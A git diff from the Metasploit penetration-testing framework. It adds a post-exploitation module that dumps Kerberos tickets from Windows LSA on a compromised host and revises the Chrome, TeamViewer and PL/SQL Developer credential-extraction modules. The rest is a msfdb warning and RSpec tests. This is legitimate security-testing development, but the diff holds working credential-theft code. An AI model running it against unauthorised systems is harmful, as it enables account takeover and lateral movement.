+ pref_paths += enumerate_pref(datastore['PLSQL_PATH']) if datastore['PLSQL_PATH'].present?
+
+ result = []
+ pref_paths.uniq.each { |pref_path| result += decrypt_pref(pref_path) }
+
+ tbl = Rex::Text::Table.new(
+ 'Header' => 'PL/SQL Developer Histories and Credentials',
+ 'Columns' => ['DisplayName', 'Username', 'Database', 'ConnectAs', 'Password', 'FilePath']
+ )
+
+ result.each do |item|
+ tbl << item.values
+ end
+
+ print_line(tbl.to_s)
+ # Only save data to disk when there's something in the table
+ if tbl.rows.count > 0
+ path = store_loot('host.plsql_developer', 'text/plain', session, tbl, 'plsql_developer.txt', 'PL/SQL Developer Histories and Credentials')
+ print_good("Passwords stored in: #{path}")
+ end
+ end
+end
diff --git a/modules/post/windows/gather/credentials/teamviewer_passwords.rb b/modules/post/windows/gather/credentials/teamviewer_passwords.rb
index 276d7f5407..535d1eaf2c 100644
--- a/modules/post/windows/gather/credentials/teamviewer_passwords.rb
+++ b/modules/post/windows/gather/credentials/teamviewer_passwords.rb
@@ -135,9 +135,7 @@ class MetasploitModule < Msf::Post
addr = session.railgun.util.alloc_and_write_wstring('Kali-Team')
client.railgun.user32.SendMessageW(window_hwnd, 'WM_GETTEXT', 1024, addr)
text = session.railgun.util.read_wstring(addr)
- client.railgun.multi([
- ['kernel32', 'VirtualFree', [addr, 0, MEM_RELEASE]],
- ])
+ session.railgun.util.free_data(addr)
if text.strip == ''
return nil
else
diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb
index 568617182b..6e7e169425 100644
--- a/modules/post/windows/gather/enum_chrome.rb
+++ b/modules/post/windows/gather/enum_chrome.rb
@@ -128,33 +128,31 @@ class MetasploitModule < Msf::Post
end
def decrypt_data(data)
- memsize = 1024 * ((data.length + 1023) / 1024)
- mem_alloc = session.railgun.kernel32.LocalAlloc(0, data.length)
- mem = mem_alloc['return']
+ mem = session.railgun.kernel32.LocalAlloc(0, data.length)['return']
+ return nil if mem == 0
+
session.railgun.memwrite(mem, data, data.length)
- if session.arch == 'x86'
- addr = [mem].pack('V')
- len = [data.length].pack('V')
- pdatain = "#{len}#{addr}".force_encoding('ascii')
- ret = session.railgun.crypt32.CryptUnprotectData(pdatain, 16, nil, nil, nil, 0, 8)
- len, addr = ret['pDataOut'].unpack('V2')
+ if session.arch == ARCH_X86
+ inout_fmt = 'V2'
+ elsif session.arch == ARCH_X64
+ inout_fmt = 'Q2'
else
- addr = [mem].pack('Q')
- len = [data.length].pack('Q')
- pdatain = "#{len}#{addr}".force_encoding('ascii')
- ret = session.railgun.crypt32.CryptUnprotectData(pdatain, 16, nil, nil, nil, 0, 16)
- len, addr = ret['pDataOut'].unpack('Q2')
+ fail_with(Failure::NoTarget, "Session architecture must be either x86 or x64.")
end
- return nil if len == 0
+ pdatain = [data.length, mem].pack(inout_fmt)
+ ret = session.railgun.crypt32.CryptUnprotectData(pdatain, nil, nil, nil, nil, 0, pdatain.length)
+ len, addr = ret['pDataOut'].unpack(inout_fmt)
- decrypted = session.railgun.memread(addr, len)
+ decrypted = len == 0 ? nil : session.railgun.memread(addr, len)
- session.railgun.kernel32.LocalFree(mem)
- session.railgun.kernel32.LocalFree(addr)
+ multi_rail = []
+ multi_rail << ['kernel32', 'LocalFree', [mem]]
+ multi_rail << ['kernel32', 'LocalFree', [addr]] if addr != 0
+ session.railgun.multi(multi_rail)
- return decrypted
+ decrypted
end
def process_files(username)
@@ -197,7 +195,7 @@ class MetasploitModule < Msf::Post
local_state_path = @profiles_path + '\\' + username + @data_path + 'Local State'
masterkey_encrypted = get_master_key(local_state_path)
masterkey = decrypt_data(masterkey_encrypted[5..])
- print_good('Found masterkey!')
+ print_good('Found masterkey!') if masterkey
end
cipher = OpenSSL::Cipher.new('aes-256-gcm')
diff --git a/modules/post/windows/manage/kerberos_tickets.rb b/modules/post/windows/manage/kerberos_tickets.rb
new file mode 100644
index 0000000000..db0ae13738
--- /dev/null
+++ b/modules/post/windows/manage/kerberos_tickets.rb
@@ -0,0 +1,347 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/kerberos/model/kerberos_flags'
+require 'rex/proto/kerberos/model/ticket_flags'
+require 'rex/proto/ms_dtyp'
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::Process
+ include Msf::Post::Windows::Lsa
+ include Msf::Exploit::Remote::Kerberos::Ticket
+
+ CURRENT_PROCESS = -1
+ CURRENT_THREAD = -2
+
+ # https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/ne-ntsecapi-security_logon_type
+ SECURITY_LOGON_TYPE = {
+ 0 => 'UndefinedLogonType',
+ 2 => 'Interactive',
+ 3 => 'Network',
+ 4 => 'Batch',
+ 5 => 'Service',
+ 6 => 'Proxy',
+ 7 => 'Unlock',
+ 8 => 'NetworkCleartext',
+ 9 => 'NewCredentials',
+ 10 => 'RemoteInteractive',
+ 11 => 'CachedInteractive',
+ 12 => 'CachedRemoteInteractive',
+ 13 => 'CachedUnlock'
+ }.freeze
+ # https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/ne-ntsecapi-kerb_protocol_message_type
+ KERB_RETRIEVE_ENCODED_TICKET_MESSAGE = 8
+ KERB_QUERY_TICKET_CACHE_EX_MESSAGE = 14
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Kerberos Ticket Management',
+ 'Description' => %q{
+ Manage kerberos tickets on a compromised host.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Will Schroeder', # original idea/research
+ 'Spencer McIntyre'
+ ],
+ 'References' => [
+ [ 'URL', 'https://github.com/GhostPack/Rubeus' ],
+ [ 'URL', 'https://github.com/wavvs/nanorobeus' ]
+ ],
+ 'Platform' => ['win'],
+ 'SessionTypes' => %w[meterpreter],
+ 'Actions' => [
+ ['DUMP_TICKETS', { 'Description' => 'Dump the Kerberos tickets' }],
+ ['ENUM_LUIDS', { 'Description' => 'Enumerate session logon LUIDs' }],
+ ['SHOW_LUID', { 'Description' => 'Show the current LUID' }],
+ ],
+ 'DefaultAction' => 'DUMP_TICKETS',
+ 'Notes' => {
+ 'Stability' => [],
+ 'Reliability' => [],
+ 'SideEffects' => []
+ },
+ 'Compat' => {
+ 'Meterpreter' => {
+ 'Commands' => %w[
+ stdapi_net_resolve_host
+ stdapi_railgun_api
+ stdapi_railgun_memread
+ stdapi_railgun_memwrite
+ ]
+ }
+ }
+ )
+ )
+
+ register_options([
+ OptString.new(
+ 'LUID',
+ [false, 'An optional logon session LUID to target'],
+ conditions: [ 'ACTION', 'in', %w[SHOW_LUID DUMP_TICKETS]],
+ regex: /^(0x[a-fA-F0-9]{1,16})?$/
+ ),
+ OptString.new(
+ 'SERVICE',
+ [false, 'An optional service name wildcard to target (e.g. krbtgt/*)'],
+ conditions: %w[ACTION == DUMP_TICKETS]
+ )
+ ])
+ end
+
+ def run
+ case session.native_arch
+ when ARCH_X64
+ @ptr_size = 8
+ when ARCH_X86
+ @ptr_size = 4
+ else
+ fail_with(Failure::NoTarget, "This module does not support #{session.native_arch} sessions.")
+ end
+ @hostname_cache = {}
+ @indent_level = 0
+
+ send("action_#{action.name.downcase}")
+ end
+
+ def action_dump_tickets
+ handle = lsa_register_logon_process
+ luids = nil
+ if handle
+ if target_luid
+ luids = [ target_luid ]
+ else
+ luids = lsa_enumerate_logon_sessions
+ print_error('Failed to enumerate logon sessions.') if luids.nil?
+ end
+ trusted = true
+ else
+ handle = lsa_connect_untrusted
+ # if we can't register a logon process then we can only act on the current LUID so skip enumeration
+ fail_with(Failure::Unknown, 'Failed to obtain a handle to LSA.') if handle.nil?
+ trusted = false
+ end
+ luids ||= [ get_current_luid ]
+
+ print_status("LSA Handle: 0x#{handle.to_s(16).rjust(@ptr_size * 2, '0')}")
+ auth_package = lsa_lookup_authentication_package(handle, 'kerberos')
+ if auth_package.nil?
+ lsa_deregister_logon_process(handle)
+ fail_with(Failure::Unknown, 'Failed to lookup the Kerberos authentication package.')
+ end
+
+ luids.each do |luid|
+ dump_for_luid(handle, auth_package, luid, null_luid: !trusted)
+ end
+ lsa_deregister_logon_process(handle)
+ end
+
+ def action_enum_luids
+ current_luid = get_current_luid
+ luids = lsa_enumerate_logon_sessions
+ fail_with(Failure::Unknown, 'Failed to enumerate logon sessions.') if luids.nil?
+
+ luids.each do |luid|
+ logon_session_data_ptr = lsa_get_logon_session_data(luid)
+ unless logon_session_data_ptr
+ print_status("LogonSession LUID: #{luid}")
+ next
+ end
+
+ print_logon_session_summary(logon_session_data_ptr, annotation: luid == current_luid ? '%bld(current)%clr' : '')
+ session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)
+ end
+ end
+
+ def action_show_luid
+ current_luid = get_current_luid
+ luid = target_luid || current_luid
+ logon_session_data_ptr = lsa_get_logon_session_data(luid)
+ return unless logon_session_data_ptr
+
+ print_logon_session_summary(logon_session_data_ptr, annotation: luid == current_luid ? '%bld(current)%clr' : '')
+ session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)
+ end
+
+ def dump_for_luid(handle, auth_package, luid, null_luid: false)
+ logon_session_data_ptr = lsa_get_logon_session_data(luid)
+ return unless logon_session_data_ptr
+
+ print_logon_session_summary(logon_session_data_ptr)
+ session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)
+
+ logon_session_data_ptr.contents.logon_id.clear if null_luid
+ query_tkt_cache_req = KERB_QUERY_TKT_CACHE_REQUEST.new(
+ message_type: KERB_QUERY_TICKET_CACHE_EX_MESSAGE,
+ logon_id: logon_session_data_ptr.contents.logon_id
+ )
+ query_tkt_cache_res_ptr = lsa_call_authentication_package(handle, auth_package, query_tkt_cache_req)
+ if query_tkt_cache_res_ptr
+ indented_print do
+ dump_session_tickets(handle, auth_package, logon_session_data_ptr, query_tkt_cache_res_ptr)
+ end
+ session.railgun.secur32.LsaFreeReturnBuffer(query_tkt_cache_res_ptr.value)
+ end
+ end
+
+ def dump_session_tickets(handle, auth_package, logon_session_data_ptr, query_tkt_cache_res_ptr)
+ case session.native_arch
+ when ARCH_X64
+ query_tkt_cache_response_klass = KERB_QUERY_TKT_CACHE_RESPONSE_x64
+ retrieve_tkt_request_klass = KERB_RETRIEVE_TKT_REQUEST_x64
+ retrieve_tkt_response_klass = KERB_RETRIEVE_TKT_RESPONSE_x64
+ when ARCH_X86
+ query_tkt_cache_response_klass = KERB_QUERY_TKT_CACHE_RESPONSE_x86
+ retrieve_tkt_request_klass = KERB_RETRIEVE_TKT_REQUEST_x86
+ retrieve_tkt_response_klass = KERB_RETRIEVE_TKT_RESPONSE_x86
+ end
+
+ tkt_cache = query_tkt_cache_response_klass.read(query_tkt_cache_res_ptr.contents)
+ tkt_cache.tickets.each_with_index do |ticket, index|
+ server_name = read_lsa_unicode_string(ticket.server_name)
+ if datastore['SERVICE'].present? && !File.fnmatch?(datastore['SERVICE'], server_name.split('@').first, File::FNM_CASEFOLD | File::FNM_DOTMATCH)
+ next
+ end
+
+ server_name_wz = session.railgun.util.str_to_uni_z(server_name)
+ print_status("Ticket[#{index}]")
+ indented_print do
+ retrieve_tkt_req = retrieve_tkt_request_klass.new(
+ message_type: KERB_RETRIEVE_ENCODED_TICKET_MESSAGE,
+ logon_id: logon_session_data_ptr.contents.logon_id, cache_options: 8
+ )
+ ptr = session.railgun.util.alloc_and_write_data(retrieve_tkt_req.to_binary_s + server_name_wz)
+ next if ptr.nil?
+
+ retrieve_tkt_req.target_name.len = server_name_wz.length - 2
+ retrieve_tkt_req.target_name.maximum_len = server_name_wz.length
+ retrieve_tkt_req.target_name.buffer = ptr + retrieve_tkt_req.num_bytes
+ session.railgun.memwrite(ptr, retrieve_tkt_req)
+ retrieve_tkt_res_ptr = lsa_call_authentication_package(handle, auth_package, ptr, submit_buffer_length: retrieve_tkt_req.num_bytes + server_name_wz.length)
+ session.railgun.util.free_data(ptr)
+ next if retrieve_tkt_res_ptr.nil?
+
+ retrieve_tkt_res = retrieve_tkt_response_klass.read(retrieve_tkt_res_ptr.contents)
+ if retrieve_tkt_res.ticket.encoded_ticket != 0
+ ticket = kirbi_to_ccache(session.railgun.memread(retrieve_tkt_res.ticket.encoded_ticket, retrieve_tkt_res.ticket.encoded_ticket_size))
+ ticket_host = ticket.credentials.first.server.components.last.snapshot
+ ticket_host = resolve_host(ticket_host) if ticket_host
+
+ Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(ticket.encode)
+ Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: ticket_host)
+ presenter = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePresenter.new(ticket)
+ print_line(presenter.present.split("\n").map { |line| " #{print_prefix}#{line}" }.join("\n"))
+ end
+ session.railgun.secur32.LsaFreeReturnBuffer(retrieve_tkt_res_ptr.value)
+ end
+ end
+ end
+
+ def target_luid
+ return nil if datastore['LUID'].blank?
+
+ val = datastore['LUID'].to_i(16)
+ Rex::Proto::MsDtyp::MsDtypLuid.new(
+ high_part: (val & 0xffffffff) >> 32,
+ low_part: (val & 0xffffffff)
+ )
+ end
+
+ def kirbi_to_ccache(input)
+ krb_cred = Rex::Proto::Kerberos::Model::KrbCred.decode(input)
+ Msf::Exploit::Remote::Kerberos::TicketConverter.kirbi_to_ccache(krb_cred)
+ end
+
+ def get_current_luid
+ luid = get_token_statistics&.authentication_id
+ fail_with(Failure::Unknown, 'Failed to obtain the current LUID.') unless luid
+ luid
+ end
+
+ def get_token_statistics(token: nil)
+ if token.nil?
+ result = session.railgun.advapi32.OpenThreadToken(CURRENT_THREAD, session.railgun.const('TOKEN_QUERY'), false, @ptr_size)
+ unless result['return']
+ error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first
+ unless error == ::WindowsError::Win32::ERROR_NO_TOKEN
+ print_error("Failed to open the current thread token. OpenThreadToken failed with: #{error}")
+ return nil
+ end
+
+ result = session.railgun.advapi32.OpenProcessToken(CURRENT_PROCESS, session.railgun.const('TOKEN_QUERY'), @ptr_size)
+ unless result['return']
+ error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first
+ print_error("Failed to open the current process token. OpenProcessToken failed with: #{error}")
+ return nil
+ end
+ end
+ token = result['TokenHandle']
+ end
+
+ result = session.railgun.advapi32.GetTokenInformation(token, 10, TOKEN_STATISTICS.new.num_bytes, TOKEN_STATISTICS.new.num_bytes, @ptr_size)
+ unless result['return']
+ error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first
+ print_error("Failed to obtain the token information. GetTokenInformation failed with: #{error}")
+ return nil
+ end
+ TOKEN_STATISTICS.read(result['TokenInformation'])
+ end
+
+ def resolve_host(name)
+ name = name.dup.downcase # normalize the case since DNS is case insensitive
+ return @hostname_cache[name] if @hostname_cache.key?(name)
+
+ vprint_status("Resolving hostname: #{name}")
+ begin
+ address = session.net.resolve.resolve_host(name)[:ip]
+ rescue Rex::Post::Meterpreter::RequestError => e
+ elog("Unable to resolve #{name.inspect}", error: e)
+ end
+ @hostname_cache[name] = address
+ end
+
+ def print_logon_session_summary(logon_session_data_ptr, annotation: nil)
+ sid = '???'
+ if datastore['VERBOSE'] && logon_session_data_ptr.contents.psid != 0
+ # reading the SID requires 3 railgun calls so only do it in verbose mode to speed things up
+ # reading the data directly wouldn't be much faster because SIDs are of a variable length
+ result = session.railgun.advapi32.ConvertSidToStringSidA(logon_session_data_ptr.contents.psid.to_i, @ptr_size)
+ if result
+ sid = session.railgun.util.read_string(result['StringSid'])
+ session.railgun.kernel32.LocalFree(result['StringSid'])
+ end
+ end
+
+ print_status("LogonSession LUID: #{logon_session_data_ptr.contents.logon_id} #{annotation}")
+ indented_print do
+ print_status("User: #{read_lsa_unicode_string(logon_session_data_ptr.contents.logon_domain)}\\#{read_lsa_unicode_string(logon_session_data_ptr.contents.user_name)}")
+ print_status("UserSID: #{sid}") if datastore['VERBOSE']
+ print_status("Session: #{logon_session_data_ptr.contents.session}")
+ print_status("AuthenticationPackage: #{read_lsa_unicode_string(logon_session_data_ptr.contents.authentication_package)}")
+ print_status("LogonType: #{SECURITY_LOGON_TYPE.fetch(logon_session_data_ptr.contents.logon_type.to_i, '???')} (#{logon_session_data_ptr.contents.logon_type.to_i})")
+ print_status("LogonTime: #{logon_session_data_ptr.contents.logon_time.to_datetime.localtime}")
+ print_status("LogonServer: #{read_lsa_unicode_string(logon_session_data_ptr.contents.logon_server)}") if datastore['VERBOSE']
+ print_status("LogonServerDNSDomain: #{read_lsa_unicode_string(logon_session_data_ptr.contents.dns_domain_name)}") if datastore['VERBOSE']
+ print_status("UserPrincipalName: #{read_lsa_unicode_string(logon_session_data_ptr.contents.upn)}") if datastore['VERBOSE']
+ end
+ end
+
+ def peer
+ nil # drop the peer prefix from messages
+ end
+
+ def indented_print(&block)
+ @indent_level += 1
+ block.call
+ ensure
+ @indent_level -= 1
+ end
+
+ def print_prefix
+ super + (' ' * @indent_level.to_i * 2)
+ end
+end
diff --git a/msfdb b/msfdb
index 58960bace1..6649fd250c 100755
--- a/msfdb
+++ b/msfdb
@@ -339,6 +339,10 @@ def reinit_db
init_db
end
+def print_webservice_removal_prompt
+ $stderr.puts "#{'[WARNING]'.red} The remote web service is being removed. Does this impact you? React here: https://github.com/rapid7/metasploit-framework/issues/18439"
+end
+
class WebServicePIDStatus
RUNNING = 0
INACTIVE = 1
@@ -1051,6 +1055,9 @@ if $PROGRAM_NAME == __FILE__
prompt_for_deletion(command)
if @options[:component] == :all
@components.each { |component|
+ if component == :webservice
+ 3.times { print_webservice_removal_prompt }
+ end
puts '===================================================================='
puts "Running the '#{command}' command for the #{component}:"
invoke_command(commands, component.to_sym, command)
@@ -1059,6 +1066,9 @@ if $PROGRAM_NAME == __FILE__
}
else
puts "Running the '#{command}' command for the #{@options[:component]}:"
+ if @options[:component] == :webservice
+ 3.times { print_webservice_removal_prompt }
+ end
invoke_command(commands, @options[:component], command)
end
end
diff --git a/spec/lib/metasploit/framework/ssh/platform_spec.rb b/spec/lib/metasploit/framework/ssh/platform_spec.rb
new file mode 100644
index 0000000000..9d81bddee7
--- /dev/null
+++ b/spec/lib/metasploit/framework/ssh/platform_spec.rb
@@ -0,0 +1,17 @@
+require 'spec_helper'
+require 'metasploit/framework/ssh/platform'
+
+RSpec.describe Metasploit::Framework::Ssh::Platform do
+ describe '.get_platform_from_info' do
+ [
+ {
+ info: 'uid=197616(vagrant) gid=197121(None) groups=197121(None),11(Authenticated Users),66048(LOCAL),66049(CONSOLE LOGON),4(INTERACTIVE),15(This Organization),545(Users),4095(CurrentSession),544(Administrators),559(Performance Log Users),405504(High Mandatory Level) MSYS_NT-10.0-17763 EC2AMAZ-PDSMQ8L 3.4.9.x86_64 2023-09-15 12:15 UTC x86_64 Msys ',
+ expected: 'windows'
+ }
+ ].each do |test|
+ it "correctly identifies #{test[:info]} as #{test[:expected]}" do
+ expect(described_class.get_platform_from_info(test[:info])).to eq(test[:expected])
+ end
+ end
+ end
+end
diff --git a/spec/lib/msf/base/sessions/command_shell_spec.rb b/spec/lib/msf/base/sessions/command_shell_spec.rb
new file mode 100644
index 0000000000..36130a5702
--- /dev/null
+++ b/spec/lib/msf/base/sessions/command_shell_spec.rb
@@ -0,0 +1,184 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe Msf::Sessions::CommandShell do
+ let(:type) { 'shell' }
+
+ describe '.type' do
+ it 'should have the correct type' do
+ expect(described_class.type).to eq(type)
+ end
+ end
+
+ describe '.can_cleanup_files' do
+ it 'should be able to cleanup files' do
+ expect(described_class.can_cleanup_files).to eq(true)
+ end
+ end
+
+ context 'when we have a command shell session' do
+ subject(:command_shell) { described_class.new(nil) }
+ let(:command_functions) do
+ %i[help background sessions resource shell download upload source irb pry].map { |command| "cmd_#{command}" }
+ end
+ let(:command_help_functions) do
+ command_functions.map { |command| "#{command}_help" }
+ end
+ let(:description) { 'Command shell' }
+
+ describe '#type' do
+ it 'should have the correct type' do
+ expect(subject.type).to eq(type)
+ end
+ end
+
+ describe '#desc' do
+ it 'should have the correct description' do
+ expect(subject.desc).to eq(description)
+ end
+ end
+
+ describe '#abort_foreground_supported' do
+ it 'should not support aborting the process running in the session' do
+ expect(subject.abort_foreground_supported).to be(true)
+ end
+ end
+
+ describe '#shell_init' do
+ it 'should initialise the shell by default' do
+ expect(subject.shell_init).to be(true)
+ end
+ end
+
+ describe 'Builtin commands' do
+ %i[background sessions resource shell download upload source irb pry].each do |command|
+ before(:each) do
+ allow(subject).to receive("cmd_#{command}_help")
+ end
+
+ describe "#cmd_#{command}" do
+ context 'when called with the `-h` argument' do
+ it 'should call the corresponding help function' do
+ subject.send("cmd_#{command}", '-h')
+ expect(subject).to have_received("cmd_#{command}_help")
+ end
+ end
+
+ context 'when called with the `--help` argument' do
+ it 'should call the corresponding help function' do
+ subject.send("cmd_#{command}", '--help')
+ expect(subject).to have_received("cmd_#{command}_help")
+ end
+ end
+ end
+ end
+ end
+
+ describe '#run_builtin_cmd' do
+ %i[help background sessions resource shell download upload source irb pry].each do |command|
+ before(:each) do
+ allow(subject).to receive("cmd_#{command}")
+ end
+ context "when called with `#{command}`" do
+ it "should call cmd_#{command}" do
+ subject.run_builtin_cmd(command.to_s, nil)
+ expect(subject).to have_received("cmd_#{command}")
+ end
+ end
+ end
+ end
+
+ describe '#run_single' do
+ before(:each) do
+ allow(subject).to receive(:run_builtin_cmd)
+ allow(subject).to receive(:shell_write)
+ end
+ %i[help background sessions resource shell download upload source irb pry].each do |command|
+ context "when called with builtin command `#{command}`" do
+ it 'should call the builtin function' do
+ subject.run_single(command.to_s)
+ expect(subject).to have_received(:run_builtin_cmd)
+ end
+ end
+ end
+
+ context 'when called with a non-builtin command' do
+ let(:cmd) { 'some_command' }
+ it 'should write the command to the shell' do
+ subject.run_single(cmd)
+ expect(subject).to have_received(:shell_write).with("#{cmd}\n")
+ end
+ end
+ end
+
+ describe '#process_autoruns' do
+ let(:initial_auto_run_script) { 'initial_auto_run_script' }
+ let(:auto_run_script) { 'auto_run_script' }
+
+ before(:each) do
+ allow(subject).to receive(:execute_script)
+ end
+
+ context 'The datastore is empty' do
+ let(:datastore) do
+ Msf::DataStore.new
+ end
+ it 'should not execute any script' do
+ subject.process_autoruns(datastore)
+ is_expected.not_to have_received(:execute_script)
+ end
+ end
+
+ context 'The datastore contains an `InitialAutoRunScript`' do
+ let(:datastore) do
+ datastore = Msf::DataStore.new
+ datastore['InitialAutoRunScript'] = initial_auto_run_script
+ datastore
+ end
+
+ it 'should execute the script' do
+ subject.process_autoruns(datastore)
+ is_expected.to have_received(:execute_script).with(initial_auto_run_script)
+ end
+ end
+
+ context 'The datastore contains an `AutoRunScript`' do
+ let(:datastore) do
+ datastore = Msf::DataStore.new
+ datastore['AutoRunScript'] = auto_run_script
+ datastore
+ end
+ it 'should execute the script' do
+ subject.process_autoruns(datastore)
+ is_expected.to have_received(:execute_script).with(auto_run_script)
+ end
+ end
+
+ context 'The datastore contains both `InitialAutoRunScript` and `AutoRunScript`' do
+ let(:datastore) do
+ datastore = Msf::DataStore.new
+ datastore['InitialAutoRunScript'] = initial_auto_run_script
+ datastore['AutoRunScript'] = auto_run_script
+ datastore
+ end
+ it 'should execute initial script before the auto run script' do
+ subject.process_autoruns(datastore)
+ is_expected.to have_received(:execute_script).ordered.with(initial_auto_run_script)
+ is_expected.to have_received(:execute_script).ordered.with(auto_run_script)
+ end
+ end
+ end
+
+ context 'when the platform is windows' do
+ let(:platform) { 'windows' }
+ before(:each) do
+ subject.platform = platform
+ end
+
+ it 'should not support aborting the process running in the session' do
+ expect(subject.abort_foreground_supported).to be(false)
+ end
+ end
+ end
+end
diff --git a/spec/lib/msf/base/sessions/meterpreter_spec.rb b/spec/lib/msf/base/sessions/meterpreter_spec.rb
index 1de154598d..8ec70758d1 100644
--- a/spec/lib/msf/base/sessions/meterpreter_spec.rb
+++ b/spec/lib/msf/base/sessions/meterpreter_spec.rb
@@ -153,5 +153,16 @@ RSpec.describe Msf::Sessions::Meterpreter do
end
-end
+ describe '#exit' do
+ it 'shuts down the session' do
+ allow(subject).to receive(:core).and_return(double('core'))
+ allow(subject).to receive(:console).and_return(double('console'))
+ expect(subject.core).to receive(:shutdown)
+ expect(subject).to receive(:shutdown_passive_dispatcher)
+ expect(subject.console).to receive(:stop)
+ subject.exit
+ end
+ end
+
+end
diff --git a/spec/lib/msf/base/sessions/smb_spec.rb b/spec/lib/msf/base/sessions/smb_spec.rb
new file mode 100644
index 0000000000..bf5fb7c04a
--- /dev/null
+++ b/spec/lib/msf/base/sessions/smb_spec.rb
@@ -0,0 +1,148 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe Msf::Sessions::SMB do
+ let(:rstream) { instance_double(Rex::Socket) }
+ let(:client) { instance_double(RubySMB::Client) }
+ let(:dispatcher) { instance_double(RubySMB::Dispatcher::Socket) }
+ let(:opts) { { client: client } }
+ let(:console_class) { Rex::Post::SMB::Ui::Console }
+ let(:user_input) { instance_double(Rex::Ui::Text::Input::Readline) }
+ let(:user_output) { instance_double(Rex::Ui::Text::Output::Stdio) }
+ let(:name) { 'name' }
+ let(:log_source) { "session_#{name}" }
+ let(:type) { 'SMB' }
+ let(:description) { 'SMB' }
+ let(:can_cleanup_files) { false }
+ let(:address) { '192.0.2.1' }
+ let(:port) { '1337' }
+ let(:peer_info) { "#{address}:#{port}" }
+
+ before(:each) do
+ allow(user_input).to receive(:intrinsic_shell?).and_return(true)
+ allow(user_input).to receive(:output=)
+ allow(rstream).to receive(:peerinfo).and_return(peer_info)
+ allow(client).to receive(:dispatcher).and_return(dispatcher)
+ allow(dispatcher).to receive(:tcp_socket).and_return(rstream)
+ end
+
+ subject(:session) do
+ smb_session = described_class.new(rstream, opts)
+ smb_session.user_input = user_input
+ smb_session.user_output = user_output
+ smb_session.name = name
+ smb_session
+ end
+
+ describe '.type' do
+ it 'should have the correct type' do
+ expect(described_class.type).to eq(type)
+ end
+ end
+
+ describe '.can_cleanup_files' do
+ it 'should be able to cleanup files' do
+ expect(described_class.can_cleanup_files).to eq(can_cleanup_files)
+ end
+ end
+
+ describe '#desc' do
+ it 'should have the correct description' do
+ expect(subject.desc).to eq(description)
+ end
+ end
+
+ describe '#type' do
+ it 'should have the correct type' do
+ expect(subject.type).to eq(type)
+ end
+ end
+
+ describe '#initialize' do
+ context 'without a client' do
+ let(:opts) { {} }
+
+ it 'raises a KeyError' do
+ expect { subject }.to raise_exception(KeyError)
+ end
+ end
+ context 'with a client' do
+ it 'does not raise an exception' do
+ expect { subject }.not_to raise_exception
+ end
+ end
+
+ it 'creates a new console' do
+ expect(subject.console).to be_a(console_class)
+ end
+ end
+
+ describe '#bootstrap' do
+ subject { session.bootstrap }
+
+ it 'keeps the sessions user input' do
+ expect { subject }.not_to change(session, :user_input).from(user_input)
+ end
+
+ it 'keeps the sessions user output' do
+ expect { subject }.not_to change(session, :user_output).from(user_output)
+ end
+
+ it 'sets the console input' do
+ expect { subject }.to change(session.console, :input).to(user_input)
+ end
+
+ it 'sets the console output' do
+ expect { subject }.to change(session.console, :output).to(user_output)
+ end
+
+ it 'sets the log source' do
+ expect { subject }.to change(session.console, :log_source).to(log_source)
+ end
+ end
+
+ describe '#reset_ui' do
+ before(:each) do
+ session.bootstrap
+ end
+
+ subject { session.reset_ui }
+
+ it 'keeps the sessions user input' do
+ expect { subject }.not_to change(session, :user_input).from(user_input)
+ end
+
+ it 'keeps the sessions user output' do
+ expect { subject }.not_to change(session, :user_output).from(user_output)
+ end
+
+ it 'resets the console input' do
+ expect { subject }.to change(session.console, :input).from(user_input).to(nil)
+ end
+
+ it 'resets the console output' do
+ expect { subject }.to change(session.console, :output).from(user_output).to(nil)
+ end
+ end
+
+ describe '#exit' do
+ subject { session.exit }
+
+ it 'exits the session' do
+ expect { subject }.to change(session.console, :stopped?).from(false).to(true)
+ end
+ end
+
+ describe '#address' do
+ subject { session.address }
+
+ it { is_expected.to eq(address) }
+ end
+
+ describe '#port' do
+ subject { session.port }
+
+ it { is_expected.to eq(port) }
+ end
+end
diff --git a/spec/lib/msf/core/exploit/remote/kerberos/client_spec.rb b/spec/lib/msf/core/exploit/remote/kerberos/client_spec.rb
index 708c1cf002..929a259201 100644
--- a/spec/lib/msf/core/exploit/remote/kerberos/client_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/kerberos/client_spec.rb
@@ -68,6 +68,102 @@ RSpec.describe Msf::Exploit::Remote::Kerberos::Client do
)
end
+ let(:as_rep_success_preauth) do
+ decode_kerb_response(
+ "\x6b\x82\x05\xa3\x30\x82\x05\x9f\xa0\x03\x02\x01\x05\xa1\x03\x02" \
+ "\x01\x0b\xa2\x2c\x30\x2a\x30\x28\xa1\x03\x02\x01\x13\xa2\x21\x04" \
+ "\x1f\x30\x1d\x30\x1b\xa0\x03\x02\x01\x12\xa1\x14\x1b\x12\x50\x4f" \
+ "\x44\x38\x2e\x4c\x41\x4e\x6e\x6f\x2e\x70\x72\x65\x61\x75\x74\x68" \
+ "\xa3\x0a\x1b\x08\x50\x4f\x44\x38\x2e\x4c\x41\x4e\xa4\x17\x30\x15" \
+ "\xa0\x03\x02\x01\x01\xa1\x0e\x30\x0c\x1b\x0a\x6e\x6f\x2e\x70\x72" \
+ "\x65\x61\x75\x74\x68\xa5\x82\x04\x09\x61\x82\x04\x05\x30\x82\x04" \
+ "\x01\xa0\x03\x02\x01\x05\xa1\x0a\x1b\x08\x50\x4f\x44\x38\x2e\x4c" \
